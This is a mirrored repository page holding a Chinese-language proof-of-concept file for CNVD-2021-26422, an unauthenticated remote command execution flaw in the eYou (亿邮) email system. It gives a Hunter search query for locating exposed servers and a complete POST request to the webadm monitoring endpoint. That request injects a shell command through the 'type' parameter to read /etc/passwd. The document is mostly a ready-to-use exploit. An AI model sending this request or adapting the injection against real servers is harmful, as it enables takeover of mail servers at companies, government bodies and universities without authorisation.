admin/POC
1
0
Fork 0
mirror of https://github.com/eeeeeeeeee-code/POC.git synced 2025-11-07 11:26:58 +00:00
Code Issues Packages Projects Releases Wiki Activity
POC/wpoc/亿邮/亿邮电子邮件系统远程命令执行漏洞-(CNVD-2021-26422).md
eeeeeeeeee-code 06c8413e64 first commit
2025-03-04 23:12:57 +08:00

37 lines
1.5 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# 亿邮电子邮件系统远程命令执行漏洞-(CNVD-2021-26422)
## 一、漏洞描述
亿邮电子邮件系统是由北京亿中邮信息技术有限公司以下简称亿邮公司开发的一款面向中大型集团企业、政府、高校用户的国产邮件系统。未经身份验证的攻击者利用该漏洞可通过精心构造恶意请求使用POST方法在目标服务器执行命令获取目标服务器权限控制目标服务器。
## 二、影响版本
亿邮电子邮件系统V8.3-V8.13的部分二次开发版本
## 三、资产测绘
+ hunter`app.name="eYou 亿邮"`
+ 特征
![1696567603305-22b3df25-983e-4f42-af65-71eb8a482b42.png](./img/o9mcm2_H8tummENZ/1696567603305-22b3df25-983e-4f42-af65-71eb8a482b42-511744.png)
## 四、漏洞复现
```java
POST /webadm/?q=moni_detail.do&action=gragh HTTP/1.1
Host: xx.xx.xx.xx
Content-Length: 25
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36
Content-Type: application/x-www-form-urlencoded;charset=UTF-8
Origin: chrome-extension://ieoejemkppmjcdfbnfphhpbfmallhfnc
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: EMPHPSID=ffah74s753ae239996a1mmbld0; empos=0
Connection: close
type='|cat /etc/passwd||'
```
![1696567646952-f83681b0-97b3-4e30-a215-9fca047ba97b.png](./img/o9mcm2_H8tummENZ/1696567646952-f83681b0-97b3-4e30-a215-9fca047ba97b-471511.png)
> 更新: 2024-02-29 23:57:46
> 原文: <https://www.yuque.com/xiaokp7/ocvun2/gn2zrdm01ief5yn7>
Reference in New Issue View Git Blame Copy Permalink